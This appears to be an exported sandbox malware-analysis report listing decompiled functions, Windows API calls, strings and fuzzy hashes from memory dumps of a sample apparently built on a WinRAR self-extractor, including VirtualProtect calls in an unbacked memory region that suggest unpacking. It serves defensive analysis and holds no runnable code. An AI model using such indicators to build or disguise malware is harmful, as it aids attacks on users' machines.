dllmain_raw.LIBCMT ref: 0229F84E

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: d34e115dea7e0857dcbe5a6492fb1c33083ebea413e34123c39cfe2b32b01ff8
Instruction ID: 6eb0739bfb053eea5e435e62b4364d58f478492e6c5e3e8c427889e7e6092736
Opcode Fuzzy Hash: d34e115dea7e0857dcbe5a6492fb1c33083ebea413e34123c39cfe2b32b01ff8
Instruction Fuzzy Hash: 64216072D2025AAFDFF19FD5CE44AAE3A6AEB84B94F154025E815E6A18C3318D41CB90

Function 00407F5D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00407F62

Part of subcall function 00401788: __EH_prolog.LIBCMT ref: 0040178D
Part of subcall function 00401788: _memset.LIBCMT ref: 004018D3
Part of subcall function 00401788: _memset.LIBCMT ref: 004018E2
Part of subcall function 00401788: _memset.LIBCMT ref: 004018F1

_wcscpy.LIBCMT ref: 00408006

Strings

lB, xrefs: 00407FA5
rar, xrefs: 00407FC5

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset$H_prolog$_wcscpy
String ID: lB$rar
API String ID: 399036908-3996953529
Opcode ID: d97c1da7bb0815ee5a3d9d3f0d1e1dcd3877ba055cf6ff2c76cea1c3e7569002
Instruction ID: 9ffdf55e66c887a604bdfebc8246e1b1093bd18122925d73c004fbf845f7006d
Opcode Fuzzy Hash: d97c1da7bb0815ee5a3d9d3f0d1e1dcd3877ba055cf6ff2c76cea1c3e7569002
Instruction Fuzzy Hash: 47418271900229AADF14EFA5CE519EEB7B9AF14304F0040BFE545B3181DB785F89CB69

Function 0040DFC2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040DFC7
_wcscpy.LIBCMT ref: 0040DFE7

Part of subcall function 004109A9: _wcslen.LIBCMT ref: 004109BF
Part of subcall function 004109A9: _wcscpy.LIBCMT ref: 004109D5

_wcscpy.LIBCMT ref: 0040E005

Part of subcall function 0040714B: __EH_prolog.LIBCMT ref: 00407150

Part of subcall function 004080F0: __EH_prolog.LIBCMT ref: 004080F5

Part of subcall function 004071F4: __EH_prolog.LIBCMT ref: 004071F9

Strings

8C, xrefs: 0040E00F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog$_wcscpy$_wcslen
String ID: 8C
API String ID: 1734755022-2849189062
Opcode ID: c63ce43d89374d237abfc7f6ebe7a89fd699cb4061a317db9fe367064d5dfe34
Instruction ID: 664881d3c4bc932fb1c9bac00e681757b7716ab8f0d0560bfd10cc2763ccace2
Opcode Fuzzy Hash: c63ce43d89374d237abfc7f6ebe7a89fd699cb4061a317db9fe367064d5dfe34
Instruction Fuzzy Hash: E71104B6909280EEE705EB59EC16BDD7B60EF46714F1080AFE005722C3CB781A44DB2E

Function 00419308 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(riched32.dll,00000000,004349D8,?,?,?,0040FCE4,00000065,00000000,00000064,00000000,sfxname,004349D8,00000000,004349D8,00000800), ref: 00419323
LoadLibraryW.KERNEL32(riched20.dll,?,0040FCE4,00000065,00000000,00000064,00000000,sfxname,004349D8,00000000,004349D8,00000800), ref: 0041932C

Strings

riched20.dll, xrefs: 00419325
riched32.dll, xrefs: 0041931E

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: LibraryLoad
String ID: riched20.dll$riched32.dll
API String ID: 1029625771-3294723617
Opcode ID: 665ab825520b37c0db97bfc81c4960f996d6183468ce5798f336c41c404a4750
Instruction ID: e45f572e2a77eb575a3180e90dbcab2bf4e842a6890d3c51445a4b0bee5f1722
Opcode Fuzzy Hash: 665ab825520b37c0db97bfc81c4960f996d6183468ce5798f336c41c404a4750
Instruction Fuzzy Hash: 93F027B1681308BBD320AF96CC06B5AFAE8DF80715F11442FE04093280D6FCA504CB68

Function 00401788 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040178D

Part of subcall function 00405E82: __EH_prolog.LIBCMT ref: 00405E87
Part of subcall function 00405E82: _memset.LIBCMT ref: 00405EC8
Part of subcall function 00405E82: _memset.LIBCMT ref: 00405EE0

Part of subcall function 0040B589: __EH_prolog.LIBCMT ref: 0040B58E

Part of subcall function 0040134B: __EH_prolog.LIBCMT ref: 00401350

_memset.LIBCMT ref: 004018D3
_memset.LIBCMT ref: 004018E2
_memset.LIBCMT ref: 004018F1

Part of subcall function 00419BE4: _malloc.LIBCMT ref: 00419BFE

Part of subcall function 00409DB1: __EH_prolog.LIBCMT ref: 00409DB6

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog_memset$_malloc
String ID:
API String ID: 1088670707-0
Opcode ID: a7af4b0fcb8ccc2b2f61d67eb90ddb849b828536c7f3cfa1af008ce627cd1eb4
Instruction ID: 8e29203ec00d47c1b604fe7ad50813d6eb700de183f12eb512e72eab7334d0cb
Opcode Fuzzy Hash: a7af4b0fcb8ccc2b2f61d67eb90ddb849b828536c7f3cfa1af008ce627cd1eb4
Instruction Fuzzy Hash: 1A513B71649B80DEC721DF7D94916DBFAE4AF26300F84497ED0EE93281C3792644CB5A

Function 00410C85 Relevance: 6.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(0291111C,0291111C), ref: 00410CBE
RtlDeleteCriticalSection.NTDLL(029112B4), ref: 00410CD0
CloseHandle.KERNEL32(0000008C), ref: 00410CDC
CloseHandle.KERNEL32(00000394), ref: 00410CE4

Part of subcall function 00410B55: WaitForSingleObject.KERNEL32(?,000000FF,00410BEC,?,?,00410CFB,?,?,?,?,?,00410D9A), ref: 00410B5B
Part of subcall function 00410B55: GetLastError.KERNEL32(?,?,?,?,?,00410D9A), ref: 00410B67

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CloseHandle$CriticalDeleteErrorLastObjectSectionSingleWait
String ID:
API String ID: 2350353865-0
Opcode ID: c64e8cfa76ad608a2ed120909e57b306d28e56f4a43c03382918d8b8bafd9ee1
Instruction ID: 277f3f1e2d4a0ace0a2c9000cfc0bca4c747b97bb868161b2ee0620fb2e87ccd
Opcode Fuzzy Hash: c64e8cfa76ad608a2ed120909e57b306d28e56f4a43c03382918d8b8bafd9ee1
Instruction Fuzzy Hash: CFF0B476101304EFD7316B74DD41ED6B7A9EF06309F11093EE69A42121CBB7A8D19B68

Function 004013A2 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004013A7
_wcscpy.LIBCMT ref: 004016B4

Strings

CMT, xrefs: 0040160E

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog_wcscpy
String ID: CMT
API String ID: 2825759377-2756464174
Opcode ID: 42e281ebb56cf4cb55eccdd6b0302c8ac1737cc6462e7e9bf28d93a2f2a160e6
Instruction ID: 4930881b4f68beb89a4a1329027f768b5c4bdd75edb1a457c8ac7b98b7ecdda6
Opcode Fuzzy Hash: 42e281ebb56cf4cb55eccdd6b0302c8ac1737cc6462e7e9bf28d93a2f2a160e6
Instruction Fuzzy Hash: FAA1C670A04740AFDB21DB68C8847AFBBE5AF46310F14496FE096A72E1C77D6D40CB5A

Function 00402BA4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402BA9

Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0AF
Part of subcall function 0040C05E: LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0C1

Part of subcall function 0040DF6E: GetLastError.KERNEL32(?,0042E76C,004063D7,00000000,%ls,?,?,00000400,?,00000000,?), ref: 0040DF83
Part of subcall function 0040DF6E: __vswprintf_c_l.LIBCMT ref: 0040DFA1

Strings

lB, xrefs: 00402E0A
lB, xrefs: 00402BDE

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: LoadString$ErrorH_prologLast__vswprintf_c_l
String ID: lB$lB
API String ID: 3756025957-3074592483
Opcode ID: 39802627dbcf3c77df7ea3a1c3ab3285a12712d0cd674fe99efb35da79dd01b0
Instruction ID: a15070b2b996df6eb1dd145cd97ac7fb9f3ba019e282c3c8317b3d19eb184d3e
Opcode Fuzzy Hash: 39802627dbcf3c77df7ea3a1c3ab3285a12712d0cd674fe99efb35da79dd01b0
Instruction Fuzzy Hash: CB7158B1504B54AAE725AB71C955BEBB7A4BF01304F00886FE1EB621C2CF7C3945CB59

Function 02291579 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(6C8B3C3C,022910D9,00000004,00000000,022E3FC0,022910D9,?,022910D9,022E4FB8,0229173D,022910D9,00E1D8E8), ref: 022915A5
VirtualProtect.KERNEL32(6C8B3C3C,022910D9,00E1D8E8,00000000,?,022910D9,022E4FB8,0229173D,022910D9,00E1D8E8), ref: 02291602

Strings

0L{, xrefs: 0229161C

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ProtectVirtual
String ID: 0L{
API String ID: 544645111-1076991039
Opcode ID: a937656abe83b63d0f6ebf39811f5dc41740c05875ee6d8efe4f9c7867802f3e
Instruction ID: 8f7a770033b13ac876f13ea7edd2f86985bebac68770c727cc9a726c64bec602
Opcode Fuzzy Hash: a937656abe83b63d0f6ebf39811f5dc41740c05875ee6d8efe4f9c7867802f3e
Instruction Fuzzy Hash: 2A21CDB29043029FCB10DFA9EC84A36B7F8FB88309F05492DF489CB241E730D954AB64

Function 00401106 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 0040115B

Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF

Strings

lB, xrefs: 0040111E
Maximum allowed array size (%u) is exceeded, xrefs: 0040112C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$lB
API String ID: 620378156-1794904129
Opcode ID: f379cc95902ed08e83f97382e802f714073fc59aa9693faf8f538d785d6520c3
Instruction ID: ecd6d351edc22f46ae8be71b77f06f45e1643f3f8673f6d176c577ed9040455b
Opcode Fuzzy Hash: f379cc95902ed08e83f97382e802f714073fc59aa9693faf8f538d785d6520c3
Instruction Fuzzy Hash: 8C01A2353007055FD728AA26D89193BB3E9EF88764350443FE99BA7B91EA39BC408718

Function 0040D75F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0040D722: _wcscpy.LIBCMT ref: 0040D727

_wcslen.LIBCMT ref: 0040D7BA

Strings

Software\WinRAR SFX, xrefs: 0040D7A2
C:\Users\user\AppData\Roaming, xrefs: 0040D777, 0040D781

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy_wcslen
String ID: C:\Users\user\AppData\Roaming$Software\WinRAR SFX
API String ID: 2972469078-1253669567
Opcode ID: dbf7a9eafdb00e32b7fa3a1cd4a02a707e8d6c2303726e21c83354b9ecb7df4e
Instruction ID: 37e9c84edacda6ef8b290c17bb8ede74041c423b0af695c938205bf6bd656323
Opcode Fuzzy Hash: dbf7a9eafdb00e32b7fa3a1cd4a02a707e8d6c2303726e21c83354b9ecb7df4e
Instruction Fuzzy Hash: E701A27290014CBEDB21EB91CC82EEBB76DEB0434DF10407BB90472191D7B99F889668

Function 0040908C Relevance: 4.6, APIs: 3, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00406F63,?,?,?), ref: 00409124
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00406F63,?,?,?,?), ref: 0040915B
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,?,00406F63,?,?,?,?,?,?,?), ref: 004091D5

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CreateFile$CloseHandle
String ID:
API String ID: 1443461169-0
Opcode ID: b5837578b0fb8a74a89ebb6aafe3dcaaf2b0bb615231f154bfd1d540f5643522
Instruction ID: 95f1cede71bd50614698bc96caefb9e91995bc6177c28dbadab223eae8176ebb
Opcode Fuzzy Hash: b5837578b0fb8a74a89ebb6aafe3dcaaf2b0bb615231f154bfd1d540f5643522
Instruction Fuzzy Hash: 5841A231A04159BEEF11DBA4CC59FEE7BB9AF01304F1440AAF441BB2D2C6799E45C754

Function 00408B00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00408B40

Strings

lB, xrefs: 00408B53
lB, xrefs: 00408B1B

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLast
String ID: lB$lB
API String ID: 1452528299-3074592483
Opcode ID: 41223a0690c9943b579172c45711a0e92a8b504fd08c0f20e9afd5d469d02a97
Instruction ID: a9f5364123ab57dd96d5c9edda6ce22fb466f6343c4bad4e1d645adddfd0e67b
Opcode Fuzzy Hash: 41223a0690c9943b579172c45711a0e92a8b504fd08c0f20e9afd5d469d02a97
Instruction Fuzzy Hash: 850128B2B01304BED724A6798E41DAB76BE8B81324758473FF552E32C0DA78AD009269

Function 00409220 Relevance: 4.6, APIs: 3, Instructions: 51COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00406E31,?,?,?), ref: 0040923B
GetLastError.KERNEL32(?,?,00406E31,?,?,?), ref: 00409283

Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E

CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,00406E31,?,?,?), ref: 0040926A

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcscpy_wcslen_wcsncpy
String ID:
API String ID: 1806569215-0
Opcode ID: 8a04b754f84aa708b8585edd25d510c85e250decd751a17a7b28c3e38ae42f96
Instruction ID: 1aa824f4aff8a1799dba1ebb7fead8b9cdd8c781bc75b68785801ff98654630a
Opcode Fuzzy Hash: 8a04b754f84aa708b8585edd25d510c85e250decd751a17a7b28c3e38ae42f96
Instruction Fuzzy Hash: 48017C3160020575DA21A665AC01FFB7758AB86B84F0808BFF941F61C6C67C9D8296AA

Function 004197A3 Relevance: 4.5, APIs: 3, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00429578,0000000C,0041E244,00000000,004298A0,0000000C,0041E27E,00000000,00419CF5,?,00423A76,00000004,00429A40,0000000C), ref: 0041981C

Part of subcall function 0041E263: __mtinitlocknum.LIBCMT ref: 0041E279
Part of subcall function 0041E263: __amsg_exit.LIBCMT ref: 0041E285

___sbh_find_block.LIBCMT ref: 004197CC
___sbh_free_block.LIBCMT ref: 004197DB

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLast___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
String ID:
API String ID: 2804226415-0
Opcode ID: f86b8c1ff154f421cf87839cb751ab4234f952b18326312c56534221757df00f
Instruction ID: 5bc8404b7fe6052094105754a90b84c37754d318645a708e6f8cb822513909e2
Opcode Fuzzy Hash: f86b8c1ff154f421cf87839cb751ab4234f952b18326312c56534221757df00f
Instruction Fuzzy Hash: DF018F75901311EADB347BB3A8167DE3BA49F02724F20015FF91066191CA7C9EC08AAD

Function 00419BE4 Relevance: 4.5, APIs: 3, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00419BFE

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

std::bad_alloc::bad_alloc.LIBCMT ref: 00419C21

Part of subcall function 00419B7A: std::exception::exception.LIBCMT ref: 00419B86

std::bad_exception::bad_exception.LIBCMT ref: 00419C35

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 832318072-0
